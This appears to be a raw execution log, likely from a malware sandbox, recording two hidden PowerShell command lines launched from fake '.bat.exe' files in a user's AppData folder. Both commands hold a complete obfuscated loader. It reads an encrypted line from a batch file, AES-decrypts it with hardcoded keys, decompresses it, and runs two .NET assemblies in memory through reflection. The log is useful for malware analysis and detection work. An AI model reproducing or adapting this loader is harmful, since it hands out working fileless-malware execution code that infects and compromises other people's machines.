unsdk.bat.exe "C:\Users\test22\AppData\Roaming\koodos40\unsdk.bat.exe" -w hidden -c $vlFe='TrXLIUaXLIUnXLIUsXLIUfXLIUormXLIUFiXLIUnXLIUalXLIUBlocXLIUkXLIU'.Replace('XLIU', '');$DthE='SXLIUpXLIUliXLIUtXLIU'.Replace('XLIU', '');$QUxo='InXLIUvoXLIUkeXLIU'.Replace('XLIU', '');$MmES='CXLIUhaXLIUnXLIUgeEXLIUxtenXLIUsiXLIUonXLIU'.Replace('XLIU', '');$QdgQ='CXLIUreaXLIUteDXLIUecXLIUryXLIUpXLIUtorXLIU'.Replace('XLIU', '');$ksNU='FroXLIUmBaXLIUse6XLIU4StXLIUriXLIUngXLIU'.Replace('XLIU', '');$KfHF='EXLIUntXLIUryXLIUPoiXLIUnXLIUtXLIU'.Replace('XLIU', '');$Swcj='LXLIUoadXLIU'.Replace('XLIU', '');$qLKe='RXLIUeadLXLIUinXLIUesXLIU'.Replace('XLIU', '');$eKiv='FiXLIUrXLIUstXLIU'.Replace('XLIU', '');$rLDv='MaiXLIUnMXLIUoXLIUdXLIUuleXLIU'.Replace('XLIU', '');$UuSh='GeXLIUtXLIUCXLIUurXLIUrentXLIUProcXLIUesXLIUsXLIU'.Replace('XLIU', '');function ZBTSu($Zjkwh){$nJPqM=[System.Security.Cryptography.Aes]::Create();$nJPqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nJPqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nJPqM.Key=[System.Convert]::$ksNU('tqfWScAP1pNK+fFf4azLynm/Ttx37x7+H/0LxlbyvdU=');$nJPqM.IV=[System.Convert]::$ksNU('yP0R44RNnaznq1nBu6JZVA==');$sdPcP=$nJPqM.$QdgQ();$HHzju=$sdPcP.$vlFe($Zjkwh,0,$Zjkwh.Length);$sdPcP.Dispose();$nJPqM.Dispose();$HHzju;}function ZCYxf($Zjkwh){$oumti=New-Object System.IO.MemoryStream(,$Zjkwh);$aUqIw=New-Object System.IO.MemoryStream;$ijlBd=New-Object System.IO.Compression.GZipStream($oumti,[IO.Compression.CompressionMode]::Decompress);$ijlBd.CopyTo($aUqIw);$ijlBd.Dispose();$oumti.Dispose();$aUqIw.Dispose();$aUqIw.ToArray();}$SYpTN=[System.Linq.Enumerable]::$eKiv([System.IO.File]::$qLKe([System.IO.Path]::$MmES([System.Diagnostics.Process]::$UuSh().$rLDv.FileName, $null)));$LeCGC=$SYpTN.Substring(3).$DthE(':');$yXFNq=ZCYxf (ZBTSu ([Convert]::$ksNU($LeCGC[0])));$ILdNg=ZCYxf (ZBTSu ([Convert]::$ksNU($LeCGC[1])));[System.Reflection.Assembly]::$Swcj([byte[]]$ILdNg).$KfHF.$QUxo($null,$null);[System.Reflection.Assembly]::$Swcj([byte[]]$yXFNq).$KfHF.$QUxo($null,$null);
2836cilena.bat.exe "C:\Users\test22\AppData\Roaming\koodos40\cilena.bat.exe" -w hidden -c $vdPg='FirEtYxstEtYx'.Replace('EtYx', '');$iJgT='LoaEtYxdEtYx'.Replace('EtYx', '');$eXGs='GetCEtYxurEtYxreEtYxnEtYxtPrEtYxocEtYxeEtYxssEtYx'.Replace('EtYx', '');$KYwW='ReadEtYxLineEtYxsEtYx'.Replace('EtYx', '');$JsUj='MaiEtYxnMEtYxodEtYxulEtYxeEtYx'.Replace('EtYx', '');$tBEH='SpEtYxlitEtYx'.Replace('EtYx', '');$kwtb='EntrEtYxyPEtYxoinEtYxtEtYx'.Replace('EtYx', '');$fUZk='InvEtYxokEtYxeEtYx'.Replace('EtYx', '');$BmuH='ChanEtYxgeEEtYxxtEtYxenEtYxsiEtYxonEtYx'.Replace('EtYx', '');$NGOw='TraEtYxnEtYxsfoEtYxrmFEtYxinaEtYxlEtYxBEtYxloEtYxckEtYx'.Replace('EtYx', '');$dDbs='FrEtYxomBEtYxaseEtYx64SEtYxtEtYxrEtYxinEtYxgEtYx'.Replace('EtYx', '');$cqiX='CreaEtYxteEtYxDEtYxecEtYxryptEtYxorEtYx'.Replace('EtYx', '');function TPodK($tMvdB){$cjuEp=[System.Security.Cryptography.Aes]::Create();$cjuEp.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cjuEp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cjuEp.Key=[System.Convert]::$dDbs('iBFwJGCnY0Knrs0zxg+V7VyhMFTxTZe1IEeaDP5iBZU=');$cjuEp.IV=[System.Convert]::$dDbs('ApQkaBnobwzwoazej6VSGA==');$FeiLj=$cjuEp.$cqiX();$uAeub=$FeiLj.$NGOw($tMvdB,0,$tMvdB.Length);$FeiLj.Dispose();$cjuEp.Dispose();$uAeub;}function fjDNh($tMvdB){$lYxVq=New-Object System.IO.MemoryStream(,$tMvdB);$FzXlT=New-Object System.IO.MemoryStream;$cMYod=New-Object System.IO.Compression.GZipStream($lYxVq,[IO.Compression.CompressionMode]::Decompress);$cMYod.CopyTo($FzXlT);$cMYod.Dispose();$lYxVq.Dispose();$FzXlT.Dispose();$FzXlT.ToArray();}$AOmyR=[System.Linq.Enumerable]::$vdPg([System.IO.File]::$KYwW([System.IO.Path]::$BmuH([System.Diagnostics.Process]::$eXGs().$JsUj.FileName, $null)));$HSdHE=$AOmyR.Substring(3).$tBEH(':');$wcmRQ=fjDNh (TPodK ([Convert]::$dDbs($HSdHE[0])));$ZwLGB=fjDNh (TPodK ([Convert]::$dDbs($HSdHE[1])));[System.Reflection.Assembly]::$iJgT([byte[]]$ZwLGB).$kwtb.$fUZk($null,$null);[System.Reflection.Assembly]::$iJgT([byte[]]$wcmRQ).$kwtb.$fUZk($null,$null);
3060